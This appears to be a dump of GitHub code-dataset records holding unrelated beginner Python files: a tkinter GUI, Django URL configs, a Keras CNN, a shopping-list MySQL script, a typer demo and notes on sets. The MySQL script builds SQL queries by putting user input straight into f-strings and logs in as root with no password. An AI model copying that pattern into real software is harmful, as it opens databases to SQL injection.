range(len(fields)):\n Label(registrationFrame, text=\"Enter your {}\".format(fields[i])).grid(row=i, column=0)\n entries.append(Entry(registrationFrame))\n entries[i].grid(row=i, column=3)\n\n registrationButton = Button(registrationFrame, text=\"Register\", command= lambda: [enterInfo([e.get() for e in entries]), exitProgram(top)])\n registrationButton.grid(row=3, column=2)\n\n def enterInfo(args):\n global user_info\n for i in range(len(args)):\n user_info[i] = args[i]\n b.createUser(global_name, user_info)\n openHomePage()\n\n\n#For opening homepage...\ndef openHomePage():\n top = Toplevel()\n top.title('Home')\n top.geometry(\"400x500\")\n\n libraryButton = Button(top, text=\"Sheet Library\", command = lambda: [openLibrary(), top.destroy()])\n libraryButton.pack()\n\n profileButton = Button(top, text=\"Profile\", command = lambda: [openProfile(), top.destroy()])\n profileButton.pack()\n\n quitButton = Button(top, text=\"Quit\", command = lambda: top.destroy())\n quitButton.pack()\n\n return\n\n#For opening worksheet library...\ndef openLibrary():\n testName = \"Jake\"\n testPwd = \"123\"\n testRatings = [1, 2, 3, 4, 5]\n testSource = \"kutasoftware.com\"\n\n top = Toplevel()\n top.title('Worksheet Library')\n top.geometry(\"1000x800\")\n\n #Create a main frame\n main_frame = Frame(top)\n main_frame.pack(fill=BOTH, expand=1)\n\n #Create a canvas\n my_Canvas = Canvas(main_frame)\n my_Canvas.pack(side=LEFT, fill=BOTH, expand=1)\n\n #Add a scrollbar\n my_scrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=my_Canvas.yview)\n my_scrollbar.pack(side=RIGHT, fill=Y)\n\n #Configure the canvas\n my_Canvas.configure(yscrollcommand=my_scrollbar.set)\n my_Canvas.bind('', lambda e: my_Canvas.configure(scrollregion = my_Canvas.bbox(\"all\")))\n\n #Create another frame inside the canvas\n second_frame = Frame(my_Canvas)\n\n #Add that New frame to a window in the canvas\n my_Canvas.create_window((0,0), window=second_frame, anchor=\"nw\")\n\n #Frame for both links and ratings...\n entireFrame = LabelFrame(second_frame)\n entireFrame.pack()\n\n #Home button...\n homeFrame = LabelFrame(entireFrame)\n homeFrame.grid(row=1, column=2)\n\n returnHomeButton = Button(homeFrame, text=\"Home\", command= lambda: [openHomePage(), top.destroy()])\n returnHomeButton.pack()\n\n #Links...\n linkFrame = LabelFrame(entireFrame)\n linkFrame.grid(row=2, column=1)\n\n #Sources...\n sourceFrame = LabelFrame(entireFrame)\n sourceFrame.grid(row=2, column=2)\n\n #Ultimate rating frame...\n ultRatingFrame = LabelFrame(entireFrame)\n ultRatingFrame.grid(row=2, column=3)\n\n all_users = b.getAllUsers()\n\n widgets_and_data = []\n f = open(\"users/sheets_to_user_name.txt\", \"w+\")\n #List of items with their url, source, and rating...\n for i, j, k in importList: #NEEDS TO BE MODIFIED...\n index = 0\n\n # i just ran this one to assign a username to all of these sheets...\n \n ''' \n rand_user = random.choice(all_users)\n b.createSheet(rand_user, j, k)\n \n f.write(j + \"\\n\")\n f.write(rand_user + \"\\n\")\n f.write(\"\\n\")\n '''\n\n\n\n\n disableVar = ACTIVE\n def disableButton():\n disableVar = DISABLED\n return\n\n #links...\n linkLabel = HTMLLabel(linkFrame, html=' {} '.format(i, j), borderwidth=5, height=2, width=50, relief=RIDGE)\n linkLabel.pack()\n\n #Sources,,,\n sourceLabel = Label(sourceFrame, text=\"Source: {}\".format(testSource), borderwidth=5, height=2, width=50, relief=RIDGE)\n sourceLabel.pack()\n\n #Ratings...\n ratingFrame = LabelFrame(ultRatingFrame)\n ratingFrame.pack()\n\n randomRating = random.choice(testRatings)\n ratingLabel = Label(ratingFrame, text=\"Rating: {}\".format(str(randomRating)), borderwidth=5, height=1, width=50, relief=RIDGE)\n ratingLabel.grid(row=1, column=1)\n\n finalRatingsFrame = LabelFrame(ratingFrame, relief=RIDGE)\n finalRatingsFrame.grid(row=1, column=2)\n\n rateInput = Entry(finalRatingsFrame, borderwidth=5, width=4, relief=RIDGE)\n rateInput.grid(row=1, column=1)\n\n rateButton = Button(finalRatingsFrame, text=\"Rate\", command = lambda: [rateSheet(index), disableButton()], borderwidth=5, height=2, width=4, relief=RAISED, state=disableVar)\n rateButton.grid(row=1, column=2)\n\n widgets_and_data.append([rateButton, rateInput, j])\n index += 1\n #Use sorted sheet list to create search hierarchy w/ dropdown menu...\n f.close()\n #For rating sheets...\n def rateSheet(index):\n #...\n b.applyRating(b.get_user_by_sheet(widgets_and_data[index][2]), widgets_and_data[index][2], widgets_and_data[index][1])\n\n#For opening profile page\ndef openProfile():\n top = Toplevel()\n top.title('Login Page')\n top.geometry(\"700x600\")\n\n nameLabel = Label(top, text=\"Username: {}\".format(testName))\n nameLabel.pack()\n\n tokenLabel = Label(top, text=\"Tokens: {}\".format(testTokens))\n tokenLabel.pack()\n\n returnHomeButton = Button(top, text=\"Home\", command= lambda: [openHomePage(), top.destroy()])\n returnHomeButton.pack()\n\n #Space to upload link...\n\n return\n\nstartButton = Button(text=\"Start\", command=openLogin)\nstartButton.pack()\n\nquitButton = Button(text=\"Quit\", command=root.destroy)\nquitButton.pack()\n\n#Finish GUI...\nroot.mainloop()\n","repo_name":"ggilliom/LevelUp-Su21","sub_path":"sheetSearchGUI.py","file_name":"sheetSearchGUI.py","file_ext":"py","file_size_in_byte":10299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4381427264","text":"from django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nfrom django.urls import path, include\nfrom drf_spectacular.views import SpectacularRedocView, SpectacularSwaggerView, SpectacularAPIView\nfrom rest_framework_simplejwt.views import TokenRefreshView, TokenObtainPairView, TokenVerifyView\n\nfrom publication_app.views import pageNotFound\n\n\ndef trigger_error(request):\n division_by_zero = 1 / 0\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('publication_app.urls')),\n path('', include('media_app.urls')),\n path('', include('tags_app.urls')),\n path('', include('comments_app.urls')),\n path('', include('likes_app.urls')),\n path('', include('profile_app.urls')),\n path('', include('friend_app.urls')),\n path('', include('subscription_app.urls')),\n path('api/token/verify/', TokenVerifyView.as_view(), name='token_verify'),\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n path('api/schema/swagger-ui/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('api/schema/redoc/', SpectacularRedocView.as_view(url_name='schema'), name='redoc'),\n path('sentry-debug/', trigger_error),\n\n]\n\nif settings.DEBUG:\n import debug_toolbar\n\n urlpatterns = [\n path('__debug__/', include(debug_toolbar.urls))\n ] + urlpatterns\n\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += staticfiles_urlpatterns()\n\n# обрабатываем исключение 404 и в view выводим другое сообщение\nhandler404 = pageNotFound\n","repo_name":"yammyk1992/django_tms","sub_path":"my_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"70616812914","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.views.generic import ListView, DetailView\nfrom knowledgeBase.models import Memo, Article, Faq, Library\nfrom django.contrib import admin\nadmin.autodiscover()\n\n\nurlpatterns = patterns('', \n \n (r'^$', 'knowledgeBase.views.index'), \n \n\n (r'^article/(?P\\d+)/$',\n DetailView.as_view(\n model=Article\n )), \n (r'^article/$', ListView.as_view(\n model=Article,\n )),\n\n (r'^faq/$', ListView.as_view(\n model=Faq,\n )),\n\n (r'^library/(?P\\d+)/$',\n DetailView.as_view(\n model=Library\n )), \n (r'^library/$', ListView.as_view(\n model=Library,\n )),\n \n (r'^memos/(?P\\d+)/$',\n DetailView.as_view(\n model=Memo\n )), \n (r'^memos/$', ListView.as_view(\n model=Memo,\n )), \n \n (r'^admin/', include(admin.site.urls)), \n\n)\n","repo_name":"dvynograd/python_django_apollo","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"71885190834","text":"import numpy as np\nimport keras\nimport matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.optimizers import Adam\nfrom keras.layers.convolutional import MaxPooling2D, Conv2D\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = np.expand_dims(X_train, axis=3)\nX_test = np.expand_dims(X_test, axis=3)\n\n\ny_train = to_categorical(y_train, 10)\ny_test = to_categorical(y_test, 10)\n\nX_train, X_test = X_train/255, X_test/255\n\ndef my_convnet_1():\n model = Sequential()\n\n model.add(Conv2D(32, (5, 5), input_shape=(28, 28, 1), activation='relu'))\n model.add(MaxPooling2D(2, 2))\n\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(2, 2))\n\n model.add(Flatten())\n model.add(Dense(100, activation='relu'))\n\n model.add(Dropout(0.5))\n model.add(Dense(10, activation='softmax'))\n\n model.compile(Adam(lr=0.01), loss='categorical_crossentropy', metrics=['accuracy'])\n\n return model\n\nmodel = my_convnet_1()\nhistory = model.fit(X_train, y_train, epochs=10, validation_split=0.2, batch_size=256, verbose=1, shuffle=True)\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('loss')\nplt.legend(['training', 'validation'])\nplt.show()\n\nscore = model.evaluate(X_test, y_test, verbose=0)\n\nprint('error', score[0])\nprint('accuracy', score[1])\n\nmodel.save('CNN_model.h5')","repo_name":"co-codin/DjangoIntegrationWithCNN","sub_path":"classifier/cnn_model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9340393756","text":"########################PROJETO DB#########################################\r\n\r\nfrom ast import Return, While\r\nimport mysql.connector\r\nfrom numpy import true_divide\r\nfrom datetime import date\r\nfrom datetime import datetime\r\n\r\nconexao = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n password=\"\",\r\n database=\"smartlist\"\r\n)\r\n\r\n\r\n################### COMANDOS PARA UTILZIACAO #############################\r\n#cursor = conexao.cursor() #indicador de inicio de conexao\r\n#comando =''\r\n#cursor.execute(comando)\r\n#conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n# resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n#cursor.close()\r\n#conexao.close() #indicador de finalziacao de conexao\r\n\r\n\r\ncursor = conexao.cursor() #indicador de inicio de conexao\r\n\r\nAppinit = True\r\ninit = True\r\n\r\n\r\n\r\n\r\nprint(\"\\n###################### Ola, Bem vindo ao SmartList ################################## \\n \")\r\nwhile init == True:\r\n print(\"###################### Digite Seus Dados para Iniciar ################################## \\n\\n \")\r\n Nome = input (\"Digite seu Nome : \")\r\n Cpf = input (\"Digite seu CPF : \")\r\n Cell = input (\"Digite seu Celular: \")\r\n Email = input (\"Digite seu Email: \")\r\n Endereco = input (\"Digite seu Endereco: \")\r\n comando1 = f'INSERT INTO Users (name, cpf, phone, mail, location) VALUES (\"{Nome}\", \"{Cpf}\", \"{Cell}\", \"{Email}\", \"{Endereco}\")'\r\n\r\n print(\"\\n ###################### Otimo!!! Ola \", Nome, \"Agora preciso que Digite onde esta realizando suas compras? ################################## \\n\\n \")\r\n\r\n NomeStore = input (\"Digite seu Nome da Loja : \")\r\n EnderecoStore = input (\"Digite o Endereco da Loja: \")\r\n CustoStore = input (\"Digite o Custo de Deslocamento: \")\r\n comando2 = f'INSERT INTO Store (name, location, comutecost) VALUES (\"{NomeStore}\", \"{EnderecoStore}\", \"{CustoStore}\")'\r\n\r\n print(\"###################### Tudo certo!!!\", Nome ,\"vamos as ompras no \", NomeStore ,\" ################################## \\n\\n \")\r\n Confirmar = input (\"Se seus dados estiverem corretos digite:\\n 1.Continuar \\n 2.Retornar \\n 3.Finalizar \\n\\n :\")\r\n if Confirmar == \"1\":\r\n init = False\r\n #Executando Commit\r\n cursor.execute(comando1)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n cursor.execute(comando2)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n \r\n while Appinit == True: # Dando Prosseguimento a aplicacao\r\n print(\"############################ Maos a obra! ############################# \\n \")\r\n print(\"############## Selecione a opcoes que deseja Executar ################# \\n \")\r\n opcao = input (\"\\n 1 = Iniciar nova lista \\n 2 = Consultar Cadastros \\n 3 = Sair da Aplicacao \\n : \")\r\n\r\n if opcao == \"1\": # OPCAO DE INICIO DE LISTA \r\n Idlista = input (\"Digite o numero da sua lista: \")\r\n comando = f'INSERT INTO Cart_Plist (Cp_id) VALUES ({Idlista})'\r\n cursor.execute(comando)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n Valor = 0\r\n cont = 0\r\n Mult=0\r\n Mult2=0\r\n Ranterior =0\r\n Qanterior=0\r\n Linit = True\r\n \r\n print(\"############################ Vamos inciar ############################# \\n \")\r\n\r\n while Linit == True:\r\n print(\"###################################### Sua lista:\",Idlista,\"###########################################\\n \")\r\n print(\"########################## Descricao / Valor / Quantidade #####################################\\n \")\r\n consulta = f'SELECT p.description, p.unitvaluer, p.amount, l.Cp_id FROM Product p JOIN Cart_Plist l WHERE l.cp_id = ({Idlista}) order by p.description'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(resultado, \"\\n\")\r\n Total = Ranterior - Mult\r\n TotalItens = Qanterior - Mult2\r\n print(\"######################################## Resumo ########################################### \\n \")\r\n print(\"########################### Total R$:\",Total, \"Quantidade de Itens:\",TotalItens,\" ########################## \\n\")\r\n print(\"############################ Adicione um Produto a sua lista ############################# \\n \")\r\n Descricao = input (\"Digite o Nome do Produto : \")\r\n Marca = input (\"Digite a Marca se Necessario : \")\r\n Codigo = (input (\"Digite o Codigo do Produto caso necessario: \"))\r\n Valor = float(input (\"Digite o valor Unitario do Produto: \"))\r\n Unidade = input (\"Digite a Medida do Produto: \")\r\n Quantidade = float(input (\"Digite a Quantidade: \"))\r\n comando4 = f'INSERT INTO Product (description, label, getin, unitvaluer, unit, amount) VALUES (\"{Descricao}\", \"{Marca}\", \"{Codigo}\", {Valor}, \"{Unidade}\", {Quantidade})'\r\n \r\n print(\"############################ Deseja adiconar outro produto? ############################# \\n \")\r\n Confirmar2 = input (\"Digite (1 para adicionar outro produto) (2 para retornar) ou (0 para finalizar) \\n\\n :\")\r\n if Confirmar2 == \"1\":\r\n Linit = True \r\n Mult=0\r\n Ranterior = Total + Quantidade*Valor\r\n Qanterior = TotalItens + Quantidade\r\n cursor.execute(comando4)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n elif Confirmar2 == \"2\":\r\n Linit = True\r\n i=0\r\n Mult = Quantidade*Valor\r\n Mult2 = Quantidade\r\n else:\r\n Linit = False\r\n cursor.execute(comando4)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n Total = Total + Quantidade*Valor\r\n TotalItens = TotalItens + Quantidade \r\n consulta = f'SELECT p.description, p.unitvaluer, p.amount, l.Cp_id FROM Product p JOIN Cart_Plist l WHERE l.cp_id = ({Idlista}) order by p.description' # DEMOSTRANDO A LISTA!!! VERIFICAR COMO MOSTRA SO A DO ID ESPECIFICO DA COMPRA\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall()\r\n print(resultado, \"\\n\")\r\n \r\n\r\n #Atualizando carrinho de comrpas na DB\r\n data_e_hora_atuais = datetime.now()\r\n data_e_hora_em_texto = data_e_hora_atuais.strftime('%d/%m/%Y %H:%M')\r\n print(\"######################################## Resumo da lista:\",Idlista,\" ########################################### \\n \")\r\n print(\"#################### Total R$:\",Total, \"Quantidade de Itens:\",TotalItens,\" ################ \\n\")\r\n comando = f'INSERT INTO Cart (Cartdate, totalvaluer, totalamount) VALUES (\"{data_e_hora_em_texto}\",{Total},{TotalItens})'\r\n cursor.execute(comando)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n \r\n print(\"#################### Como voce Avalia essa compra? ################ \\n\")\r\n Comentario = input (\"Comente algo sobre sua lista OU DEIXE EM BRANCO : \")\r\n Avaliacao = input (\"Avalie sua lista de 1 a 10 OU DEIXE EM BRANCO: \")\r\n comandoeva = f'INSERT INTO Evaluation (description, rate) VALUES (\"{Comentario}\",\"{Avaliacao}\")'\r\n cursor.execute(comandoeva)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n elif opcao == \"2\": # OPCAO DE CONSULTA DE BANCO\r\n Cinit = True\r\n while Cinit == True:\r\n print(\"#################### Voce selecionou a opcao de consulta#################### \\n\")\r\n print(\"\\n ##############digite a opcao que deseja consultar#############################\")\r\n copcao = input (\"\\n 1.Usuario \\n 2.Lojas \\n 3.Produtos \\n 4.Listas \\n 5.Avaliacoes \\n :\")\r\n if copcao == \"1\":\r\n consulta = f'SELECT * FROM Users'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(resultado)\r\n \r\n elif copcao == \"2\":\r\n consulta = f'SELECT * FROM Store GROUP BY name ORDER BY name'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n\r\n elif copcao == \"3\":\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n consulta = f'SELECT * FROM Product ORDER BY description'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n\r\n elif copcao == \"4\":\r\n consulta = f'SELECT * FROM Cart ORDER BY '\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n\r\n elif copcao == \"5\":\r\n consulta = f'SELECT * FROM Evaluation'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n else:\r\n Cinit = False\r\n else:\r\n Appinit = False \r\n elif Confirmar == \"2\":\r\n initr = True\r\n print(\"###################### Ok, Vamos tenrar novamente ################################## \\n \")\r\n else:\r\n initr = False\r\n print(\"###################### Agradecemos pela sua Preferencia ################################## \\n \")\r\n print(\"############################ Programa Finalizado ################################## \\n \")\r\n break","repo_name":"HyogoMoura/Banco-de-Dados-Aula","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"38417951379","text":"from typing import Dict\n\nimport click\nimport typer\nfrom rich import inspect\n\napp = typer.Typer()\napp2 = typer.Typer()\napp3 = typer.Typer()\napp.add_typer(app2, name=\"schlock\")\n\nRULES = {\n \"1\": \"Pillage, then burn.\",\n \"2\": \"A Sergeant in motion outranks a Lieutenant who doesn't know what's going on.\",\n \"3\": \"An ordnance technician at a dead run outranks everybody.\",\n \"4\": \"Close air support covereth a multitude of sins.\",\n}\n\n\n@app.callback()\ndef load_ctx(ctx: typer.Context):\n ctx.obj = {}\n ctx.obj[\"rules\"] = RULES\n\n\n@app.command()\ndef hello(ctx: typer.Context, name: str):\n typer.echo(f\"Hi {name}\")\n\n\ndef autocomplete_rules(ctx: typer.Context):\n # typer.echo(inspect(ctx))\n # typer.echo(repr(ctx.obj))\n rules: Dict = ctx.obj[\"rules\"]\n comps = list(rules.keys())\n return comps\n\n\ndef callback_check(ctx: typer.Context, value: str):\n rules: Dict = ctx.obj[\"rules\"]\n comps = list(rules)\n if value not in comps:\n raise typer.BadParameter(f\"Only 1-4 are allowed. tried: {value}\")\n return value\n\n\n@app2.command()\ndef says(\n ctx: typer.Context,\n index: str = typer.Argument(\n ...,\n help=\"Choose 1-4.\",\n autocompletion=autocomplete_rules,\n callback=callback_check,\n ),\n):\n \"\"\"Choose a saying.\"\"\"\n typer.echo(ctx.obj[\"rules\"][index])\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"DonalChilde/eve-esi-jobs","sub_path":"src/eve_esi_jobs/typer_cli/typer_bug.py","file_name":"typer_bug.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30790736203","text":"#PYTHON-SETS##\n#sets are used to store multiple items in single variable##\n\nmyset = {\"apple\",\"banana\",\"apple\"}#here sets are not allowed duplicate values\nprint(myset)#op-apple,banana##\n\n#and sets are unchangeable once sets are created ##\n\n\n#using len() function find no index in sets##\n\nmyset = {\"apple\",\"banana\",\"cherry\"}\nprint(len(myset))#op-3\n\n\n#a set can be different data types@string,int,boolean##\nset1 = {\"apple\", \"banana\", \"cherry\"}\nset2 = {1, 5, 7, 9, 3}\nset3 = {True, False, False}\nprint(set1)\nprint(set2)\nprint(set3)\n\n##A set with strings, integers and boolean values:##\nset1 = {\"abc\", 34, True, 40, \"male\"} \nprint(set1)\n\n\n#data type of set##python defined its\" class set\" data type##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nprint(type(myset))##op-\n\n#by using set() constructor make it as set #using double brackets##\nmyset = ((\"apple\",\"banana\",\"cherry\"))##it is not a set but using these constructur make a set##\nprint(myset)\n\n#access items##\n#You cannot access items in a set by referring to an index or a key.#\n#But you can loop through the set items using a for loop, or ask if a specified value is present in a set, by using the in keyword##\n\nmyset = {\"apple\",\"banana\",\"cherry\"}\nfor x in myset:\n print(x)\n\n#check if banana is present inset##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nprint(\"banana\" in myset)\n#once set is created we cant change the items but we can add new items##\n\n##add item##\n#use add() function to add the item to the set##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.add(\"orange\")\nprint(myset)\n\n#add the items from another set to current set by using upadte() method.##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nnewset = {\"orange\",\"mango\",\"kiwi\"}\nmyset.update(newset)\nprint(myset)\n\n#WE CAN USE ITERABLE (TUPLE,list,dictionaries)these are add to set by using update() method##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nnewset = [\"melon\",\"mango\",\"kiwi\"]#these all are list items##\nmyset.update(newset)\nprint(myset)\n\n#remove the set item using remove() or discard() method##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.remove(\"apple\")\nprint(myset)\n ##or discard() method##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.discard(\"banana\")\nprint(myset)\n\n\n#here we can remopve set items by using pop() method also but pop method is remove ##\nmyset = {\"apple\", \"banana\", \"cherry\"}\n\nx = myset.pop()#using method##\n\nprint(x)##removinng item#\n\nprint(myset)#after removing item print##\n#above actually pop() method which item remove we dont know because of items or inordered so,###\n\n\n#using clear() method clear the items##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.clear()\nprint(myset)\n\n#\"delete\" keyword using delete the set items#\n#myset = {\"apple\",\"banana\",\"cherry\"}\n#del myset\n#print(myset)#actually here will get error, ,beacuse here given delete command, after deleting cant print the myset items##\n\n##You can loop through the set items by using a for loop##:\nmyset = {\"apple\",\"banana\",\"cherry\"}\nfor x in myset:\n print(x)\n\n##JOIN SETS##\n#there are many ways to join two or more set items in python we can use uninon() and update() methods for joining the set items##\n\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset2 ={1,2,3,4}\nmyset3 =myset.union(myset2)\nprint(myset3)\n\n#using update() method join two set items##\nmyset = {\"a\",\"b\",\"c\"}\nmyset2 ={1,2,3,4}\nmyset.update(myset2)\nprint(myset)\n\n#we can print only deplicates on the both items by using intersection_update() method#\nx= {\"apple\",\"banana\",\"kiwi\"}\ny= {\"apple\",\"melon\",\"guva\",\"kiwi\"}\nx.intersection_update(y)\nprint(x)\n\n\n##The intersection() method will return a new set, that only contains the items that are present in both sets.##\nx = {\"apple\", \"banana\", \"cherry\"}\ny = {\"google\", \"microsoft\", \"apple\"}\n\nz = x.intersection(y)\n\nprint(z)\n\n##The symmetric_difference_update() method will keep only the elements that are NOT present in both sets.\n\nx = {\"apple\", \"banana\", \"cherry\"}\ny = {\"google\", \"microsoft\", \"apple\"}\n\nx.symmetric_difference_update(y)\n\nprint(x)\n\n##The symmetric_difference() method will return a new set, that contains only the elements that are NOT present in both sets.##\nx = {\"apple\", \"banana\", \"cherry\"}\ny = {\"google\", \"microsoft\", \"apple\"}\n\nz = x.symmetric_difference(y)\n\nprint(z)\n","repo_name":"sreddyshapathi123/python-test-practice","sub_path":"sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32801048527","text":"#Day_02_01_MultipleRegression\n#모두를 위한 딥러닝\n#모든데이터는 다음 x, y 와 같이 나오게된다(이게 정규 format임)\n#y데이터의 형태에 따라서 에 따라서 어떤 모델형태인지 판가름 할 수 있다\n# 퀴즈0 : 아래 데이터에 대해서 모델을 구축하시오!\n#맨처음에 shape error 가 났는데 이는, tupel에서는 shape 이 지원 안되기 때문!\n# ^위 문제 해결위해선 항상 어떻게 데이터가 생겼는지 한번 봐보자!\n#epochs 옆에 verbose 는 train 과정을 깔끔히 한다\n\ndef MultipleRegression():\n import tensorflow.keras as keras\n\n x = [[1, 0],\n [0, 2],\n [3, 0],\n [0, 4],\n [5, 0]]\n y = [[1],\n [2],\n [3],\n [4],\n [5]]\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(1))\n model.compile(optimizer=keras.optimizers.SGD(), loss=keras.losses.mse)\n model.fit(x, y)\n return\n\n\n# 전처리 중 x_train 과 y_train 의 차원을 맞춰주는게 습관이 되면 좋다.(중요)\n# 여기서 차원 맞추기는\ndef MultipleRegression_boston():\n import tensorflow.keras as keras\n import numpy as np\n #퀴즈1 : 보스턴 집값 데이터에 포함된 학습과 검사 데이터의 shape 을 알려주세요\n boston_train, boston_test = keras.datasets.boston_housing.load_data(test_split=0.2)\n x_train, y_train = boston_train\n x_test, y_test = boston_test\n # print(type(boston_train))\n # print(x_train[:10])\n # print(y_train[:10])\n #퀴즈2 보스턴 집값데이터에 대해 80퍼의 데이터로 학습하고, 20퍼센트 데이터의 평균 오차를 구하시오\n\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(1))\n model.compile(optimizer=keras.optimizers.SGD(learning_rate=0.000001),\n loss=keras.losses.mse,\n metrics=['mae'])\n model.fit(x_train, y_train, epochs=10)\n p = model.predict(x_test)\n p = p.reshape(-1)\n e = p - y_test.reshape(-1)\n\n print('mae :', np.mean(np.absolute(e)))\n print('mse :', np.mean(e ** 2))\n return\n\nprint(MultipleRegression_boston())\n\n","repo_name":"Derrick-Kwon/RNN_AI_Academy","sub_path":"Day_02_01_MultipleRegression.py","file_name":"Day_02_01_MultipleRegression.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71246763926","text":"#!/usr/bin/env python\n\nimport re\n\nclass bpls:\n def __init__ (self, file):\n\n self.vars = {} # This will be a dictionary of dictionaries. The first level is \n # Indexed by the variable names, and the second level has all of\n # the specific information for each variable (initially just type\n # and dimensions)\n\n # For now, assume that the input is from a bpls call with no cl arguments given\n # Can add more flexibility later by checking the output first and then parsing\n # accordingly\n for line in file:\n var_dict = {}\n\n tokens = line.split()\n\n # The first item is the type\n var_dict ['type'] = tokens[0]\n \n # Now parse the last item, which is either 'scalar' or a comma separated list of \n # integer dimensions wrapped in curly braces, i.e. {7, 8, 9}\n if tokens[-1] == 'scalar':\n var_dict ['dims'] = None\n else:\n start = line.rindex('{') + 1\n end = line.rindex('}')\n var_dict ['dims'] = line[start:end].split (', ')\n\n # Now everything that is left, minus external whitespace, is the variable name.\n # There is a small hole here which is that if the variable name ends with\n # a space, there is no way to tell, since bpls fills with extra spaces to \n # align the columns. It is probably a bad idea to have variable names that\n # end with spaces anyway, so I'm not going to worry about this right now.\n\n line = line.strip()\n start = line.index (' ') + 1 \n if tokens[-1] == 'scalar':\n end = -6\n else:\n end = line.rindex ('{')\n\n var_dict ['name'] = line[start:end].strip()\n\n\n # Put this var in the top level map according to its name\n self.vars [var_dict['name'] ] = var_dict\n\n\n def get_vars (self):\n return list(self.vars.keys())\n\n\n def get_dims (self, var):\n print(\"getting dims for %s\" % var)\n if var not in list(self.vars.keys()):\n return None\n return self.vars[var]['dims']\n\n\n\n\ndef main(argv=None):\n\n\n# args = parse_command_line()\n\n test = open (\"gts.bpls\")\n\n b = bpls (test)\n\n for var in b.get_vars():\n print('%s %s' % (var, b.get_dims (var) )) \n \n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ornladios/ADIOS","sub_path":"utils/skel/lib/skel_bpls.py","file_name":"skel_bpls.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"30"} +{"seq_id":"36361760845","text":"from 